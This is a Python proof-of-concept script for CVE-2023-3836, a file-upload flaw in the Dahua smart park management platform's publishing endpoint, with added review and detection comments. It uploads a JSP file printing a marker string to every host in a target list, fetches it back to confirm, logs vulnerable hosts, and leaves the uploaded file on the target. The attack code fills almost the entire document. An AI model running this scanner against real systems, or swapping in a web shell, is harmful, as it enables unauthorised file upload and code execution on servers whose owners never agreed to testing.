import argparse
import textwrap
import requests
import json
# Silences urllib3 warnings process-wide. Both HTTP calls in poc() pass verify=False,
# so after this line nothing on screen indicates that server certificates are not
# being validated and that responses are therefore unauthenticated.
requests.packages.urllib3.disable_warnings()
# multiprocessing.dummy exposes the Pool API on top of threads, not processes.
from multiprocessing.dummy import Pool
from rich.console import Console
# Single shared rich console used by the output helpers current(), no_current() and ban().
console = Console()
# Startup banner (ASCII art plus version/author tags); passed to ban() in the
# __main__ block. Note that poc() reuses the name `text` as a local variable.
text = """
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ █████╗ ██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗██╔══██╗╚════██╗██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝╚█████╔╝ █████╔╝███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔══██╗ ╚═══██╗██╔═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝╚█████╔╝██████╔╝╚██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚════╝ ╚═════╝ ╚═════╝
@version:1.0.0
@author:zt-byte
"""
def current(text):
    """Report *text* as a positive finding, in bold green on the shared console."""
    message = f"[+]{text} 存在漏洞"
    console.print(message, style="bold green")
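def no_current(text):
    """Report *text* as a negative result, in bold yellow on the shared console.

    The original body printed the same "vulnerable" message as current(), so a
    negative result would have been displayed as a finding. The wording now says
    "not vulnerable" and uses a "[-]" prefix so the two outcomes cannot be confused
    when reading scan output.
    """
    console.print(f"[-]{text} 不存在漏洞", style="bold yellow")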
def ban(text):
    """Print *text* (the startup banner) in bold blue on the shared console."""
    banner_style = "bold blue"
    console.print(text, style=banner_style)
# Request headers for the upload probe sent by poc(). The multipart boundary is
# hard-coded here and must stay identical to the boundary used inside `data`.
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15", "Content-Type": "multipart/form-data; boundary=dd8f988919484abab3816881c55272a7", "Accept-Encoding": "gzip, deflate", "Connection": "close"}
# Pre-built multipart body: a "Filedata" part carrying a .jsp file whose only
# statement prints the marker string "vultest", followed by "poc" and "Submit"
# form fields.
# Detection note: the constant boundary, the fixed file name and the marker string
# are sent verbatim in every request, so they can be matched in proxy/WAF logs and
# searched for on disk when checking whether a host was probed with this script.
# NOTE(review): nothing in this file deletes the uploaded .jsp; after a positive
# result it stays on the target until it is removed by hand.
data = "--dd8f988919484abab3816881c55272a7\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"0EaE10E7dF5F10C2.jsp\"\r\n\r\n<%out.println(\"vultest\");%>\r\n--dd8f988919484abab3816881c55272a7\r\nContent-Disposition: form-data; name=\"poc\"\r\n\r\npoc\r\n--dd8f988919484abab3816881c55272a7\r\nContent-Disposition: form-data; name=\"Submit\"\r\n\r\nsubmit\r\n--dd8f988919484abab3816881c55272a7--"
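def poc(url):
    """Check one base URL for the publishing file-upload flaw (CVE-2023-3836).

    Posts the module-level multipart body to the upload endpoint, reads the
    stored path from the JSON reply, fetches the stored file and looks for the
    marker string. A hit is appended to result.txt and reported via current().

    Args:
        url: Base URL of the target, used as-is as a prefix (no trailing-slash
            or scheme normalisation is done here).

    Returns:
        None. Unreachable hosts and unexpected replies are skipped silently so a
        single bad target does not stop the rest of the scan.

    Review notes:
        * Both requests use verify=False, so the peer is not authenticated and a
          reply could come from anything on the path.
        * The marker "vultest" is also present in the uploaded source text, so a
          server that returns the file as static content without executing it is
          reported the same way as one that executes it.
        * The uploaded file is not removed afterwards.
    """
    url_end = url + "/publishing/publishing/material/file/video"
    try:
        response = requests.post(url_end, headers=headers, data=data, verify=False, timeout=4)
        reply = json.loads(response.text)
        path = reply["data"]["path"]
        uploaded_url = url + "/publishingImg/" + path
        # The original follow-up GET had no timeout, so one stalled host could
        # block a worker thread indefinitely; reuse the 4 s limit of the POST.
        body = requests.get(uploaded_url, verify=False, timeout=4).text
    except (requests.RequestException, ValueError, KeyError, TypeError):
        # Network failure, non-JSON reply, or a reply without data.path: treat the
        # target as not testable. Narrowed from a bare `except:` so programming
        # errors and KeyboardInterrupt are no longer swallowed.
        return

    if "vultest" in body:
        try:
            with open("result.txt", "a", encoding="utf-8") as file:
                file.write(uploaded_url + "\n")
        except OSError as exc:
            # A failed write must not hide the finding; it is still printed below.
            print(f"result.txt: {exc}")
        current(url_end)
    else:
        print(f"{uploaded_url}不存在漏洞")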
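def op(file):
    """Read the target list from *file* and return it as a list of strings.

    Each line is stripped of surrounding whitespace. Blank lines are skipped:
    the original kept them as empty strings, which were then turned into
    scheme-less request URLs by poc() and failed there.

    Args:
        file: Path of a UTF-8 text file with one base URL per line.

    Returns:
        The non-empty, stripped lines in file order. Entries are not validated
        as URLs here.
    """
    # Avoid the original local name `list`, which shadowed the builtin.
    targets = []
    with open(f"{file}", "r", encoding="utf-8") as f:
        for line in f:
            entry = line.strip()
            if entry:
                targets.append(entry)
    return targets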
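if __name__ == '__main__':
    # Entry point: print the banner, read the target file given with -f and run
    # poc() over every entry on a pool of worker threads.
    ban(text)
    parser = argparse.ArgumentParser(description='大华智慧园区综合管理平台publishing文件上传poc',
                                     formatter_class=argparse.RawDescriptionHelpFormatter,
                                     epilog=textwrap.dedent(
                                         '''example: python CVE-2023-3836.py -f ip.txt'''))
    # -f is now mandatory: without it args.file is None and op() would try to open
    # a file literally named "None" and fail with FileNotFoundError.
    parser.add_argument("-f", "--file", dest="file", type=str, required=True,
                        help="要查询的url文件,example:urls.txt")
    args = parser.parse_args()
    targets = op(args.file)  # renamed from `list`, which shadowed the builtin
    mp = Pool(20)  # number of worker threads; adjust as needed
    try:
        mp.map(poc, targets)  # run poc() once per target
    finally:
        # Always release the worker threads, even if map() raises.
        mp.close()
        mp.join()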